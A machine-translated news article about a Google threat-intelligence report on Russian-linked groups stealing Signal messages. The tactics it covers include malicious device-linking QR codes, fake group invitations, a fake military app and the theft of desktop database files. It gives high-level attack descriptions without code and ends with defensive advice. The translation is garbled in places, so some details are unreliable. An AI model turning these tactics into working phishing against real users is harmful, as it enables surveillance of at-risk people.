"Safe" messenger attacked hackers: how do data stole through Signal - investigation

To extend: QR codes, groups of groups and from entrusted contacts, false instructions for users-all this is only part of the methods from the arsenal of Russian cybercriminals. Some efforts were directed to the military, and for that they learned to simulate "nettle". Russian hackers are trying to abduct data through the Signal messenger, known for high security.

This is stated in the Cyber ​​Cloud's Mandiant Analysis Report Dan Black, published on February 20, on the name of Google Threat Intelligence Group (GTIG), Google Teams that deals with cybersecurity threats. Attacks are reported to be focused on persons who "are of interest to Russian special services". GTIG expects that the tactics and methods that are now using hackers against Signal will become more common in the future, including beyond the Ukrainian Theater of War Theater.

Signal is a popular among servicemen, politicians, journalists, activists and other risk groups, which makes the program costly for cybercriminals. In order to seize confidential information, they resort to tricks. The latest and most common technique is the abuse of "connected devices", which allows you to use a messenger, such as from a phone and tablet at a time. To connect an additional device, you need to scan a special QR code.

Hackers create harmful QR codes, scanning which users connect their account to the attacker's device. As a result, all messages come in real time, providing a permanent listening tool. Often, harmful QR codes were masked by real Signal resources, such as invitations to groups, notifications of the security system or devices. In more specialized operations, hackers created false web pages that were masked by programs for the military, and already built QR codes.

APT44 hacker (also known as Sandworm or Seashell Blizzard, it is associated with the main center of special technologies of the GRF) to use the data of data captured by soldiers on the front of the device. That is, conditionally the invaders find a smartphone of the Ukrainian military, Signal is tied to a controlled server. In addition to the fact that the cybercrime sees other people's messages, even if the phone is no longer in his hands, he can seek himself for the owner.

It is noted that if you can access the data, access can be accessed for a long time. This is due to the lack of protection for appropriate monitoring, so the "extra" device can be unnoticed for a long time. The Russian Spy Group UNC5792 has changed the pages of "group invitations". Hackers used modified "invitations" to Signal groups designed to look identical to them.

However, in fake group invitations, the JavaScript code, which usually directs the user to the group, was replaced by a harmful block. It contained a unified resource identifier (URI) used by a new device. That is, the victims of such attacks thought that they were combined to the groups in Signal, and in fact they were given full access to their accounts hackers. Another hacker group related to Russia is UNC4221.

Її зусилля були зосереджені на українських військовослужбовцях. Hackers have developed a fake version of the components of the nettle, which the Armed Forces is used to guide artillery. The purpose is also the abduction of data from Signal. In addition, hackers tried to disguise devices to invitation to the group from a trusted contact.

Different variations of such phishing attacks were recorded: cybercriminals used a special Pinpoint code, which allowed to collect basic information of the user and its geolocation with the API Geolocation. Hackers also worked to steal Signal database files. The attacks were targeted on Android and Windows. APT44 worked with Wavesign tool, which regularly sends requests to the database. At the same time, Rclone unloaded answers with the latest messages in the system.

The harmful software of Infamous Chisel, also probably created by Sandworm, searched for Android devices related to Signal for kidnapping. The Turla hacker, which the US and the United Kingdom is attributed to the 16 FSB Center, used a special Powershell script to get a message from Signal Desktop after infection. UNC11151, related to Belarus, used Robocopy utility to copy files from Signal Desktop for further abduction.

Google has given tips on how to protect their personal devices from possible hacker attacks: iPhone users have recommended that you consider switching on lock mode. "We are grateful to the Signal team for close cooperation in investigating this activity. The latest Signal and IOS versions contain enhanced features intended to protect against such phishing campaigns in the future. Update to the latest version to turn these features," GTIG said.